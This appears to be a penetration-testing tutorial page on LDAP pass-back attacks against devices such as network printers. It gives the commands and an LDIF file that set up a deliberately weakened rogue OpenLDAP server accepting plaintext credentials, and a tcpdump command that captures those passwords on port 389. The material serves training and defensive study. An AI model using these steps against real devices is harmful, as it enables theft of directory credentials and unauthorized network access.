LDAP Pass-back Attacks

LDAP Pass-back attacks are a method of gaining unauthorized access to a device's configuration, particularly when LDAP (Lightweight Directory Access Protocol) parameters are defined. Such parameters are often found in the configuration settings of devices like network printers, typically accessible through web interfaces.

In an LDAP Pass-back attack, an attacker manipulates the LDAP configuration, which may include the IP address or hostname of the LDAP server. The attacker replaces this information with their own IP address and subsequently triggers the LDAP configuration test. This action compels the device to initiate LDAP authentication attempts with the attacker's rogue device. The attacker can then intercept these authentication attempts, ultimately gaining access to LDAP credentials.

Note: The default port for LDAP communication is 389.

While interacting with a web interface (like the one in the picture) of a device, such as a printer, responses can be observed.

However, to effectively carry out this attack, a rogue LDAP server needs to be established and configured in an insecure manner to ensure that credentials are transmitted in plaintext.

Hosting a Rogue LDAP Server - OpenLDAP

To set up a rogue LDAP server, you can follow these steps:

  1. Update the package list and install OpenLDAP tools: 

    sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd

  2. When prompted, choose "No" to skip server configuration.

  3. Provide the DNS domain name and use the same name for the Organization name.

  4. Set an Administrator password.

  5. Select "MDB" as the LDAP database to use.

  6. For the last two options, ensure the database is not removed when purged and that old database files are moved before new ones are created.

Before using the rogue LDAP server, it must be made vulnerable by limiting the supported authentication mechanisms. This involves creating an LDIF (LDAP Data Interchange Format) file named "olcSaslSecProps.ldif" with the following content:

#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

This file sets properties related to SASL (Simple Authentication and Security Layer) security, such as disabling mechanisms that support anonymous login and specifying that no protection is required.

Apply the LDIF file to the LDAP server and restart the service with the following commands:

sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart

You can verify that the configuration has been applied to your rogue LDAP server by using the following command:

ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms

The output should display supported SASL mechanisms as "PLAIN" and "LOGIN."

To capture network traffic related to this attack, you can use the following command with tcpdump:

sudo tcpdump -SX -i breachad tcp port 389

This command will capture traffic, including passwords in plain text, on port 389, which is commonly used for LDAP communication.

PreviousCertificates in ADNextCracking NetNTLM Challenge with Responder

Last updated